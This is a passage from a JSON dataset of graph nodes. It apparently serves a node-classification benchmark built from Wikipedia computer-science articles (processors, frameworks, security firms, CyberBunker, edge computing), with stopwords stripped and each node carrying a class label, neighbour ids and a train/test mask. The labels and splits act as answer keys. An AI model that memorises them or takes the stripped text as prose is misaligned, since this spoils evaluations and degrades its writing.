released msx2 version msx turbo r commonly referred fray turbo r voice acting alternate opening animation sequence another enhanced remake nec pc-engine titled fray cd later released micro cabin several differences fray cd original fray magical adventure fray cd alternate fmv opening animation sequence additional stage different bosses plot deviates original game mostly near end game msx2 version unofficially translated english oasis project egg re-released pc-9801 pc engine msx2 windows8.1 compatible versions 2009-2014 fray well received including japanese msx magazine msx versions bestseller japan long time msx turbo r version rated good spanish magazine msx club 2012 fray cd re-release given positive review gamer praised excellent voice acting funny writing",
    "neighbors": [
      10339,
      10534,
      9006,
      10931,
      4181,
      6011
    ],
    "mask": "None"
  },
  {
    "node_id": 146,
    "label": 3,
    "text": "Comparison_of_ARMv8-A_cores:comparison armv8-a cores table 64/32-bit armv8-a architecture cores comparing microarchitectures implement aarch64 instruction set mandatory optional extensions chips support 32-bit aarch32 legacy applications falkor data center chip chips type floating-point unit fpu better one older armv7 neon simd chips chips coprocessors appliedmicro helix also includes cores older 32-bit architecture armv7 chips socs combine arm cortex-a53 arm cortex-a57 samsung exynos 7 octa dhrystone implied dmips synthetic benchmark developed 1980s longer representative prevailing workloads use caution",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      8231,
      4139,
      8237,
      9774,
      2097,
      7218,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      9863,
      8842,
      659,
      7833,
      666,
      5786,
      4258,
      6818,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6926,
      6415,
      5417,
      810,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      5028,
      7077,
      9638,
      10675,
      1461,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 147,
    "label": 3,
    "text": "PowerBook_140:powerbook 140 powerbook 140 released first line powerbooks mid-range powerbook low-end 100 high-end 170 powerbook 170 unlike 100 powerbook featured internal floppy drive codenames model tim lite tim lc replacements leary 1992 replaced powerbook 145 essentially speed bump though powerbook 160 essentially superseded new mid-line model intended replacement portable 140 series identical 170 though compromised number high-end model features make affordable mid-range option apparent difference 140 used cheaper diagonal passive matrix display instead sharper active matrix version used 170 internally addition slower 16 mhz processor 140 also lacked floating point unit fpu could upgraded also came standard 20 mb hard drive compared 170 40 mb drive 140 introduced system 7.0.1 specifically support new power management unique hardware features however due ram prices 1991 combined already high list price 140 like 100 170 2 mb ram soldered directly onto logicboard critics felt restrictive use system 7 since localized versions system 7 yet available worldwide japanese 6.0.7 kanjitalk version apple system software modified support three new powerbooks released version j-6.0.7.1 result version unofficially adapted use standard 6.0.7 allowing many users run system 6 powerbooks rather upgrading on-board ram expensive proprietary ram card 2 mb card us 300 though released time powerbook 170 powerbook 100 140 170 designed entirely apple 100 miniaturized sony full-sized macintosh portable result 140 represents first notebook computer created apple 100 actually representing first design improvements though internal architecture oldest series replaced powerbook 145b june 1993 codename model colt 45 powerbook 145b powerbook 140 powerbook 145 came lower price additional 2 mb ram soldered motherboard codename model pikes peak unlike previous mac models like performas 145b ship full set system disks system 7.1 preinstalled internal hard disk single system start-up disk included package also included two utilities provide basic backup restore functions unlike 140 145 145b run system 7.0.1 needs least system 7.1 145 superseded powerbook 150 next low end powerbook",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      6037,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 148,
    "label": 9,
    "text": "ColdBox_Platform:coldbox platform coldbox open-source conventions-based modular web application framework intended building enterprise applications cfml using hierarchical mvc approach coldbox uses convention configuration aims simplicity rapid development makes use model-view-controller dependency injection unit testing aspect-oriented programming architectural patterns coldbox allows development stand-alone modules shared across apps coldbox active heavily documented cfml framework coldbox supported lucee railo two popular open source cfml engines adobe coldfusion application servers supported ide plugins visual studio code sublime text eclipse ide adobe coldfusion builder list notable users coldbox platform high-level attributes coldbox coldbox platform comprises three independent frameworks coldbox conventions-based framework programmed cfml differing cfml mvc frameworks use xml declarative logic controllers example controller coldbox supports url mappings routing rails style adapted coldfusion also supports creation restful routing coldbox allows easy creation restful urls via url mappings extension detection natively coldbox detect extension supplied uri resource allows detection extensions security around ability customize extensions coldbox supports javascript frameworks provide ajax capabilities also provides auto-marshalling function render object following formats natively xml wddx json jsonp text pdf custom coldbox offers support creating monitoring developing soap web services flex/air remote components allows one development paradigm multiple gui interfaces",
    "neighbors": [
      1920,
      3462,
      8582,
      1802,
      3469,
      2062,
      9614,
      2576,
      9618,
      1812,
      4507,
      6941,
      9245,
      10526,
      4512,
      8739,
      3876,
      4777,
      5165,
      5677,
      4529,
      7987,
      692,
      8883,
      7862,
      3895,
      5048,
      9144,
      6074,
      190,
      5314,
      9666,
      8644,
      1353,
      6860,
      595,
      84,
      4056,
      6493,
      102,
      8554,
      8691,
      10486,
      3705,
      11259
    ],
    "mask": "Test"
  },
  {
    "node_id": 149,
    "label": 4,
    "text": "Anonymizer_(company):anonymizer company anonymizer inc. internet privacy company founded 1995 lance cottrell author mixmaster anonymous remailer anonymizer originally named infonex internet name changed anonymizer 1997 company acquired web based privacy proxy name developed justin boyan carnegie mellon university school computer science boyan licensed software c2net public beta testing selling infonex one first web privacy companies founded anonymizer creates vpn link servers users computer creating random ip address rather one actually used used anonymously report crime avoid spam avoid internet censorship keep users identity safe track competitors among uses usa patriot act signed october 2001 response september 11 attacks brought attention anonymization tools lance cottrell quoted saying anonymizer keeps record activity users protects company users fbi subpoenas anonymizer featured one 50 incredibly useful sites july 2002 issue yahoo internet life magazine stealthsurfer ii 2005 came anonymizer using 128-bit ssl technology mask ip addresses create encrypted channel 2005 anonymizer maintained product line including anonymous surfing keep users ip addresses anonymous anti-spyware found removed spyware user computer digital shredder removed cookies temporary files emptied cache total privacy suite featured three aforementioned products anonymizer ’ operation anti-censorship software introduced 2006 addresses internet censorship people republic china allowing chinese internet users access blocked sites abraxas corporation acquired anonymizer may 2008 2010 cubic purchased abraxas 124 million cash ntrepid acquired anonymizer late 2010 wholly owned subsidiary ntrepid anonymizer offers variety consumer information security services including vpn multi-protocol proxy client software iphone ipad anonymizer proxy server encrypted e-mail services anti-spyware anti-phishing anti-pharming enterprise class competitive intelligence tools although used separate products anonymizer one product anonymizer universal early 2014 term anonymizer often used signify internet based anonymization tool even though trademark anonymizer inc",
    "neighbors": [
      10915,
      9732,
      6539,
      9548,
      8017,
      4725
    ],
    "mask": "None"
  },
  {
    "node_id": 150,
    "label": 4,
    "text": "Cyber_spying:cyber spying cyber spying cyber espionage act practice obtaining secrets information without permission knowledge holder information individuals competitors rivals groups governments enemies personal economic political military advantage using methods internet networks individual computers use proxy servers cracking techniques malicious software including trojan horses spyware may wholly perpetrated online computer desks professionals bases far away countries may involve infiltration home computer trained conventional spies moles cases may criminal handiwork amateur malicious hackers software programmers cyber spying typically involves use access secrets classified information control individual computers whole networks strategic advantage psychological political physical subversion activities sabotage recently cyber spying involves analysis public activity social networking sites like facebook twitter operations like non-cyber espionage typically illegal victim country fully supported highest level government aggressor country ethical situation likewise depends one viewpoint particularly one opinion governments involved response reports cyber spying china united states amitai etzioni institute communitarian policy studies suggested china united states agree policy mutually assured restraint respect cyberspace would involve allowing states take measures deem necessary self-defense simultaneously agreeing refrain taking offensive steps engaging cyber espionage would also entail vetting commitments september 2015 united states china agreed allow parties nations cyberspy commercial gain prohibit government spying dukes well-resourced highly dedicated organized cyberespionage group f-secure believe working russian federation since least 2008",
    "neighbors": [
      7424,
      7809,
      5764,
      10756,
      1544,
      5002,
      9233,
      10392,
      9761,
      3759,
      9537,
      8387,
      4435,
      9688,
      7515,
      4956,
      5087,
      5986,
      7652,
      2151,
      7527,
      4725,
      8824,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 151,
    "label": 9,
    "text": "Cypher_(Query_Language):cypher query language cypher declarative graph query language allows expressive efficient querying updating property graph cypher largely invention andrés taylor working neo4j inc. formerly neo technology 2011 cypher originally intended used graph database neo4j opened opencypher project october 2015 cypher based property graph model addition standard graph elements nodes edges called relationships cypher adds labels properties concepts nodes may zero labels relationship exactly one relationship type nodes relationships also zero properties property key-value binding string key value cypher type system cypher type system includes nodes relationships paths maps lists integers floating-point numbers booleans strings cypher contains variety clauses among common match functions slightly different sql match used describing structure pattern searched primarily based relationships used add additional constraints patterns example query return movies actor named 'nicole kidman acted produced certain year sent parameter cypher additionally contains clauses writing updating deleting data create delete used create delete nodes relationships set remove used set values properties add labels nodes nodes deleted relationships still existing example opencypher project effort started standardize cypher query language graph processing one part process first opencypher implementers meeting ocim first announced december 2016",
    "neighbors": [
      6629,
      6775,
      2972,
      9290,
      10413,
      6161,
      8788,
      151,
      6651,
      987,
      4604,
      9631
    ],
    "mask": "Train"
  },
  {
    "node_id": 152,
    "label": 5,
    "text": "Border_Gateway_Multicast_Protocol:border gateway multicast protocol border gateway multicast protocol bgmp ietf project attempted design true inter-domain multicast routing protocol bgmp planned able scale order operate global internet",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      2206,
      8862,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      686,
      562,
      2996,
      9909,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      6993,
      5843,
      2904,
      5978,
      3036,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 153,
    "label": 3,
    "text": "Pollack's_rule:pollack rule pollack rule states microprocessor performance increase due microarchitecture advances roughly proportional square root increase complexity contrasts power consumption increase roughly linearly proportional increase complexity complexity context means processor logic i.e area rule industry term named fred pollack lead engineer fellow intel pollack rule gained increasing relevance 2008 due broad adoption multi-core computing concern expressed businesses individuals huge electricity demands computers generous interpretation rule allows case ideal device could contain hundreds low-complexity cores operating low power together performing large amounts processing work quickly describes massively parallel processor array mppa currently used embedded systems hardware accelerators according moore law new technology generation doubles number transistors increases speed 40 hand pollack rule implies microarchitecture advances improve performance another therefore overall performance increase roughly two-fold power consumption stays practice however implementing new microarchitecture every new generation difficult microarchitecture gains typically less",
    "neighbors": [
      6656,
      2273,
      5798,
      5802,
      78,
      8367,
      785,
      1778,
      6801,
      7963,
      7006,
      11487
    ],
    "mask": "Test"
  },
  {
    "node_id": 154,
    "label": 7,
    "text": "Edge_computing:edge computing edge computing distributed computing paradigm brings computation data storage closer location needed improve response times save bandwidth increase iot devices edge network producing massive amount data computed data centers pushing network bandwidth requirements limit despite improvements network technology data centers guarantee acceptable transfer rates response times could critical requirement many applications furthermore devices edge constantly consume data coming cloud forcing companies build content delivery networks decentralize data service provisioning leveraging physical proximity end user similar way aim edge computing move computation away data centers towards edge network exploiting smart objects mobile phones network gateways perform tasks provide services behalf cloud moving services edge possible provide content caching service delivery storage iot management resulting better response times transfer rates time distributing logic different network nodes introduces new issues challenges distributed nature paradigm introduces shift security schemes used cloud computing data encrypted different encryption mechanism adopted since data may transit different distributed nodes connected internet eventually reaching cloud edge nodes may also resource constrained devices limiting choice terms security methods moreover shift centralized top-down infrastructure decentralized trust model required hand keeping data edge possible shift ownership collected data service providers end-users iot solutions currently perfect target hackers edge computing help secure networks increasing data security scalability distributed network must face different issues first must take account heterogeneity devices different performance energy constraints highly dynamic condition reliability connections compared robust infrastructure cloud data centers moreover security requirements introduce latency communication nodes may slow scaling process management failovers crucial order maintain service alive single node goes unreachable users still able access service without interruptions moreover edge computing systems must provide actions recover failure alerting user incident aim device must maintain network topology entire distributed system detection errors recovery become easily applicable factors may influence aspect connection technology use may provide different levels reliability accuracy data produced edge could unreliable due particular environment conditions edge application services reduce volumes data must moved consequent traffic distance data must travel provides lower latency reduces transmission costs computation offloading real-time applications facial recognition algorithms showed considerable improvements response times demonstrated early research research showed using resource rich machines near mobile users called cloudlets offering services typically found cloud provided improvements execution time tasks offloaded edge node.. hand offloading every task may result slowdown due transfer times device nodes depending workload optimal configuration defined another vision architecture give re-birth cloud gaming game simulations run cloud rendered video transferred lightweight clients mobile vr glasses etc type streaming also known pixel streaming conventional cloud games may suffer high latency insufficient bandwidth since amount data transferred huge due high resolutions required services real-time games fps first person shooting games strict constraints latency processing game simulation edge node necessary immersive game plays edge nodes used game streaming known gamelets usually one two hops away client notable applications include connected autonomous cars. smart cities home automation systems alex reznik chair etsi mec isg standards committee broad definition anything ’ traditional data center could ‘ edge ’ somebody definitions limited state edge report concentrates servers close proximity last mile network gamelet paper defines 'the edge node mostly one two hops away mobile client meet response time constraints real-time games also states gamelet system basically distributed micro-cloud system computationally intensive tasks game simulation rendering offloaded gamelet node hops time one two hops away mobile client philip laidler believes edge compute includes workloads running customer premises call customer enterprise device edge another inclusive way define edge computing include type computer program delivers low latency nearer requests karim arabi ieee dac 2014 keynote subsequently invited talk mit mtl seminar 2015 defined edge computing broadly computing outside cloud happening edge network specifically applications real-time processing data required definition cloud computing operates “ big data ” edge computing operates “ instant data ” real-time data generated sensors users",
    "neighbors": [
      8576,
      10368,
      516,
      8326,
      10247,
      9366,
      8098,
      2339,
      10921,
      428,
      2605,
      3886,
      9779,
      1849,
      1083,
      321,
      6981,
      8262,
      1223,
      6856,
      4957,
      477,
      4194,
      8675,
      4964,
      9314,
      7537,
      754,
      2804,
      3450,
      6268
    ],
    "mask": "Validation"
  },
  {
    "node_id": 155,
    "label": 9,
    "text": "Foreach_loop:foreach loop foreach control flow statement traversing items collection class|collection foreach usually used place standard loop|for statement programming |statement unlike loop constructs however foreach loops usually maintain explicit counter essentially say everything set rather x times avoids potential off-by-one error makes code simpler read object-oriented languages iterator even implicit often used means traversal foreach statement languages defined order processing item collection first last foreach statement many languages especially array programming languages particular order simplifies loop optimization general particular allows vector processing items collection concurrently syntax varies among languages use simple word codice_1 roughly follows programming language support foreach loops include abc programming language |abc actionscript ada programming language |ada c++11 c sharp programming language |c coldfusion markup language cfml cobra programming language |cobra programming language |d daplex query language ecmascript erlang programming language |erlang java programming language |java since 1.5 using reserved word codice_1 loop foreach loop javascript lua programming language |lua objective-c since 2.0 parasail programming language |parasail perl php python programming language |python realbasic ruby programming language |ruby scala programming language |scala smalltalk swift programming language |swift tcl tcsh unix shell visual basic .net windows powershell notable languages without foreach c programming language |c c++ pre-c++11 ada programming language |ada supports foreach loops part normal loop say x array data structure|array syntax used mostly arrays also work types full iteration needed ada 2012 generalized loops foreach loops kind container array lists maps ... language c programming language |c collections foreach construct however several standard data structures used collections foreach made easily c macro|macro however two obvious problems occur c string collection char c int array collection int array size known compile-time general string array collection collection size known run-time c sharp programming language |c assuming myarray array integers language integrated query linq provides following syntax accepting delegate cli |delegate lambda programming |lambda expression c++11 provides foreach loop syntax similar foreach loop java|java c++11 range-based statements implemented gnu compiler collection gcc since version 4.6 clang since version 3.0 visual c++ 2012 version 11 range-based syntactic sugar equivalent compiler uses argument-dependent lookup resolve begin end functions c++ standard library also supports for_each applies element function predefined function lambda expression range-based beginning end range direction change direction range altering first two parameters qt software |qt c++ framework offers macro providing foreach loops using stl iterator interface boost c++ libraries |boost set free peer-reviewed portable c++ libraries also provides foreach loops c++/cli language proposes construct similar c assuming myarray array integers cfml incorrectly identifies value index construct codice_4 variable receive actual value array element index common lisp provides foreach ability either dolist macro powerful loop macro iterate data types even mapcar function foreach support added delphi programming language |delphi 2005 uses enumerator variable must declared var section iteration foreach form eiffel programming language |eiffel loop construct introduced keyword codice_5 example every element structure codice_6 printed local entity codice_7 instance library class codice_8 cursor feature codice_9 provides access structure element descendants class codice_8 created handle specialized iteration algorithms types objects iterated across codice_6 example based classes inherit library class codice_12 iteration form eiffel loop also used boolean expression keyword codice_13 replaced either codice_14 effecting universal quantification codice_15 effecting existential quantification iteration boolean expression true items codice_6 counts greater three following true least one item count greater three go programming language |go foreach loop used loop array slice string map channel using two-value form get index/key first element value second element using one-value form get index/key first element groovy programming language |groovy supports loops collections like arrays lists ranges groovy also supports c-style loop array index collections groovy also iterated using keyword closure default loop dummy named haskell programming language |haskell allows looping lists monad functional programming |monadic actions using codice_17 codice_18 codice_17 arguments flipped control.monad also possible generalize functions work applicative functors rather monads data structure traversable using codice_20 codice_1 arguments flipped codice_22 codice_23 arguments flipped data.traversable java programming language |java foreach-construct introduced java development kit jdk 1.5.0 official sources use several names construct referred enhanced loop for-each loop foreach statement ecmascript 6 standard codice_24 index-less iteration generators arrays alternatively function-based style unordered iteration keys object javascript features codice_25 loop limit iteration object properties excluding inherited prototype chain sometimes useful add hasownproperty test comparison layout engines ecmascript object object|if supported javascript engine webkit/safari means version 3 later ecmascript 5 provided object.keys method transfer keys object array iterate numerical index values index value ipairs array end iterate index values index value pairs array end mathematica codice_26 simply evaluate expression element list without returning value common use codice_27 returns result evaluation new list loops supported mint possessing following syntax codice_28 codice_29 infinite loop mint written using loop infinite set|infinitely long list foreach loops called objective-c fast enumeration|fast enumeration supported starting objective-c 2.0 used iterate object implements nsfastenumeration protocol including nsarray nsdictionary iterates keys nsset etc nsarrays also broadcast message members blocks c language extension |blocks available nsarray automatically perform block every contained item type collection iterated dictate item returned iteration example ocaml functional language thus equivalent foreach loop achieved library function lists arrays lists short way arrays short way parasail programming language |parasail parallel programming language supports several kinds iterators including general iterator container parasail also supports filters iterators ability refer key value map forward iteration elements my_map selecting elements keys my_set pascal programming language |pascal iso standard 10206:1990 introduced iteration pascal programming language set types|set types thus perl foreach equivalent shorter used traverse elements list expression denotes collection loop evaluated list-context item resulting list turn aliased loop variable list literal example array examples hash example direct modification collection members perl 6 distinct language perl 5 must used traverse elements list foreach longer allowed expression denotes collection loop evaluated list-context flattened default item resulting list turn aliased loop variable list literal example array examples loop statement modifier form hash example direct modification collection members doubly pointy block also possible extract keys values using alternate syntax direct modification collection members python tuple assignment fully available foreach loop also makes trivial iterate key value pairs associative array codice_30 kind loop python equivalent counter loop found languages ... ... though using codice_31 function considered pythonic using conventional scheme codice_32 function codice_33 one-argument function also used hash codice_33 one-argument function swift programming language |swift uses codice_1…codice_36 construct iterate members collection codice_1…codice_36 loop often used closed half-open range constructs iterate loop body certain number times systemverilog supports iteration vector array type dimensionality using codice_39 keyword trivial example iterates array integers complex example iterates associative array arrays integers tcl uses foreach iterate lists possible specify one iterator variable case assigned sequential values list also possible iterate one list simultaneously following codice_40 assumes sequential values first list codice_41 sequential values second list without type inference invoke hypothetical codice_42 command three times giving color name time pipeline category articles example ada code category articles example perl code category articles example php code category articles example python code category articles example racket code category articles example smalltalk code category articles example tcl code category control flow category programming language comparisons category articles example java code category articles example haskell code ru цикл просмотра",
    "neighbors": [
      3076,
      3462,
      5255,
      8582,
      1931,
      2062,
      6414,
      3856,
      5521,
      6674,
      8854,
      3736,
      1435,
      155,
      4507,
      5917,
      7326,
      9245,
      3876,
      9126,
      3367,
      4777,
      428,
      5165,
      5677,
      5806,
      9008,
      11442,
      1203,
      692,
      3765,
      7479,
      6074,
      7612,
      10684,
      9665,
      963,
      8644,
      10435,
      8262,
      5961,
      8524,
      3577,
      8397,
      11212,
      337,
      11219,
      5588,
      6228,
      6102,
      7894,
      4057,
      10586,
      11610,
      8289,
      10083,
      4069,
      10470,
      8041,
      2666,
      3562,
      8554,
      6640,
      10097,
      1016,
      3705,
      7292,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 156,
    "label": 4,
    "text": "TrustPort:trustport trustport a.s. software company headquartered brno czech republic focused data security portfolio consists solutions complete data network security medium large businesses trustport threat intelligence network monitoring protection attacks protection viruses spyware malware general implementing antivirus technology using multiple scanning engines filtering unwanted data e. g. email spam objectionable website content developing filtering technologies assuring confidentiality authenticity electronic data trustport products designed using home users individual computers industry users extensive networks trustport preceded aec abbreviation association electronics computers founded 1991 aec specialized area data security already 1993 developed security software original aec software products 1990s generally branded ironware included solutions file encryption network communications protection electronic mail encryption etc. early products became foundation stones future software trustport brand software gradually became known ironware security suite september 2000 based previous contract aec norman asa ironware security suite product rights development passed onwnership norman software renamed norman security suite aec became business partner norman selling software 2002 aec started software production introduced datashredder trustmail trustport encryption cebit computer expo datashredder designed irreversible deletion sensitive data trustmail encryption signing data trustport encryption file encryption applicable personal computers mobile devices 2003 aec launched trustport certification authority first certification authority czech republic supported trusted timestamping year second version trustmail released implementing timestamping technology also comprehensive security solution started shaped idea build unified software integrating different elements essential computer security like antivirus software antispam firewall cryptography time personal computers server computer protected originally named trustport phoenix rebel completed 2005 dividing three main products became known trustport workstation trustport internet gateway trustport webfilter november 2007 acquisition agreement aec cleverlance signed cleverlance new owner aec made strategic decision form standalone company aec development department march 2008 new company name trustport officially established jiří mrnuštík first chief executive officer aec became trustport reseller later year two major changes made trustport product portfolio trustport workstation renamed trustport pc security order align product name products competing companies trustport antivirus established standalone specialized product essential antimalware protection since foundation trustport standalone company business partnerships established reinforced important distributors around globe e.g united kingdom canada italy india mexico colombia spain france etc.. nowadays trustport offers software home users small offices middle large companies specializing data network security protection successfully used home users companies around world",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      517,
      1417,
      7948,
      3981,
      10637,
      9488,
      4374,
      10392,
      3867,
      1052,
      156,
      11166,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      3629,
      6699,
      8615,
      10283,
      6834,
      4403,
      9523,
      10166,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      10708,
      2005,
      8024,
      8998,
      1242,
      2907,
      7515,
      8668,
      2654,
      9055,
      11225,
      9569,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 157,
    "label": 4,
    "text": "CyberBunker:cyberbunker cyberbunker internet service provider according website hosts services web site 'except child pornography anything related terrorism served host pirate bay one many wikileaks mirrors cyberbunker also accused host spammers botnet command-and-control servers malware online scams company also involved border gateway protocol hijacks ip addresses used spamhaus united states department defense spamhaus hijack part exceptionally large distributed denial service attack launched march 2013 size attack received considerable mainstream media attention company named place housed former cold war bunker bunker built 1955 outside small town kloetinge south netherlands intended war time provincial military command center dutch military could withstand nuclear attack discarded dutch military 1994 cyberbunker lists address bunker location cyberbunker servers unclear cyberbunker long history run-ins law 2002 fire broke bunker operated fire put discovered besides internet hosting services mdma laboratory operation three four men charged operation lab convicted three-year prison sentences fourth acquitted due lack evidence october 2009 bittorrent tracker pirate bay subjected legal action various anti-piracy groups including dutch copyright organisation brein moved away sweden cyberbunker 2010 hamburg district court ruled cyberbunker operating germany cb3rob ltd co kg longer allowed host pirate bay subject €250,000 fine 2 years imprisonment infringement october 2011 spamhaus identified cyberbunker providing hosting spammers contacted upstream provider a2b asking service cancelled a2b initially refused blocking single ip address linked spamming spamhaus responded blacklisting a2b address space a2b capitulated dropping cyberbunker filed complaints dutch police spamhaus extortion march 2013 spamhaus added cyberbunker blacklist shortly afterwards distributed denial service ddos attack previously unreported scale peaking 300 gbit/s average large-scale attack often around 50 gbit/s largest known previously publicly reported attack 100 gbit/s launched spamhaus email web servers using domain name system dns amplification attack attack lasted week steve linford chief executive spamhaus said withstood attack companies google made resources available help absorb traffic attack investigated five different national cyber-police-forces around world spamhaus alleged cyberbunker cooperation criminal gangs eastern europe russia behind attack cyberbunker respond bbc request comment allegation cloudflare internet security firm located san francisco california assisting spamhaus combating dos attack also targeted 28 march 2013 cyberbunker website went offline short period time possibly becoming victim ddos attack 29 march 2013 unrelated secure data storage company bunkerinfra issued press release stating owners former military bunker since 2010 claims made cyberbunker regarding continued usage complex false operating bunker since fire 2002 businessweek reported stating bunker full junk acquired quoted guido blaauw general manager stating cyberbunker publicity material photoshop 25 april 2013 sven olaf kamphuis vocal spokesman cyberbunker arrested request dutch authorities near barcelona spanish police collaboration eurojust anonymous press release uploaded pastebin following day demanding release kamphuis threatened large-scale attacks remain custody spanish authorities reported kamphuis operated well-equipped bunker used van mobile computing office information bunker provided september 2013 revealed second arrest made april relation spamhaus attack suspect 16-year-old london",
    "neighbors": [
      2085,
      2887,
      2409,
      4883,
      11029,
      7515,
      8956
    ],
    "mask": "None"
  },
  {
    "node_id": 158,
    "label": 7,
    "text": "Open_Grid_Services_Architecture:open grid services architecture open grid services architecture ogsa describes service-oriented architecture grid computing environment business scientific use developed within open grid forum called global grid forum ggf time around 2002 2006 ogsa distributed interaction computing architecture based around services assuring interoperability heterogeneous systems different types resources communicate share information ogsa based several web service technologies web services description language wsdl simple object access protocol soap aims largely independent transport-level handling data ogsa described refinement web services architecture specifically designed support grid requirements concept ogsa derived work presented 2002 globus alliance paper physiology grid ian foster carl kesselman jeffrey m. nick steven tuecke developed ggf working groups resulted document entitled open grid services architecture version 1.5 2006 ggf published use case scenarios according defining grid roadmap ogsa standards v 1.0 ogsa open grid services architecture version 1.5 described capabilities late 2006 updated version ogsa several associated documents published including first several planned normative documents open grid services architecture glossary terms version 1.5 open grid services infrastructure ogsi related ogsa originally intended form basic “ plumbing ” layer ogsa superseded web services resource framework wsrf ws-management",
    "neighbors": [
      5956,
      10020,
      8070,
      105,
      4107,
      9876,
      11353,
      222,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 159,
    "label": 9,
    "text": "M_Sharp:sharp pronounced em sharp code generation tool domain-specific language used create websites web applications translate entities page definitions asp.net web forms c code turn form user interface business logic layer application main goals reduce time development increase code quality reduce human errors generates codes mainly c programming language sharp suffix used number .net languages followed convention uses ide web-based application inside user type select suggestions intelli-sense use mouse define entities user interface modules example would form module two buttons cancel save displays key text field key field read-only save button adds content block database internally keeps module definition json file time build generate c ascx ascx.cs files moment xml necessary render module installed machines serve page new versions integrated microsoft visual studio",
    "neighbors": [
      225,
      9345,
      9926,
      11625,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 160,
    "label": 4,
    "text": "Privilege_Management_Infrastructure:privilege management infrastructure privilege management process managing user authorisations based itu-t recommendation x.509 2001 edition x.509 specifies components privilege management infrastructure pmi based x.509 attribute certificates acs later editions x.509 2005 2009 added components pmi including delegation service 2005 interdomain authorisation 2009 edition privilege management infrastructures pmis authorisation public key infrastructures pkis authentication pmis use attribute certificates acs hold user privileges form attributes instead public key certificates pkcs hold public keys pmis sources authority soas attribute authorities aas issue acs users instead certification authorities cas issue pkcs users usually pmis rely underlying pki since acs digitally signed issuing aa pki used validate aa signature x.509 ac generalisation well known x.509 public key certificate pkc public key pkc replaced set attributes certificate holder subject therefore one could theory use x.509 acs hold user public key well attribute user similar vein x.509 pkcs also used hold privilege attributes subject adding subject directory attributes extension x.509 pkc however life cycle public keys user privileges usually different therefore n't usually good idea combine certificate similarly authority assigns privilege someone usually different authority certifies someone public key therefore n't usually good idea combine functions soa/aa ca trusted authority pmis allow privileges authorisations managed separately keys authentication first open source implementation x.509 pmi built funding ec permis project software available description implementation found x.509 acs pmis used today grids see grid computing assign privileges users carry privileges around grid popular grid privilege management system today called voms user privileges shape vo memberships roles placed inside x.509 ac voms server signed voms server embedded user x.509 proxy certificate carrying around grid rise popularity xml soap based services saml attribute assertions popular x.509 acs transporting user attributes however similar functionality strongly bind set privilege attributes user",
    "neighbors": [
      5956,
      517,
      6381,
      10831,
      9744,
      10486,
      7294,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 161,
    "label": 4,
    "text": "Pwnie_Awards:pwnie awards pwnie awards recognize excellence incompetence field information security winners selected committee security industry professionals nominations collected information security community awards presented yearly black hat security conference name pwnie award based word pwn hacker slang meaning compromise control based previous usage word pronounced similarly name pwnie awards pronounced pony meant sound like tony awards awards ceremony broadway theater new york city pwnie awards founded 2007 alexander sotirov dino dai zovi following discussions regarding dino discovery cross-platform quicktime vulnerability alexander discovery ani file processing vulnerability internet explorer award best server-side bug went security researchers discovered heartbleed best client-side bug went george hotz finding bug chrome os epic fail award went apple goto fail bug ios os x award best server-side bug went sergey golubchik mysql authentication bypass flaw two awards best client-side bug given sergey glazunov pinkie pie google chrome flaws presented part google pwnium contest award best privilege escalation bug went mateusz jurczyk j00ru vulnerability windows kernel affected 32-bit versions windows award innovative research went travis goodspeed way send network packets would inject additional packets award best song went control nerdcore rapper dual core new category award tweetie pwnie award twitter followers judges went musclenerd iphone dev team representative ios jailbreaking community epic fail award presented metasploit creator hd moore f5 networks static root ssh key issue award accepted employee f5 unusual winner category usually accept award ceremony nominees included linkedin data breach exposing password hashes antivirus industry failing detect threats stuxnet duqu flame award epic 0wnage went flame md5 collision attack recognizing sophisticated serious piece malware weakened trust windows update system",
    "neighbors": [
      7809,
      3843,
      1540,
      5764,
      10631,
      6537,
      11,
      6797,
      1429,
      6550,
      1688,
      928,
      7713,
      2213,
      3495,
      8488,
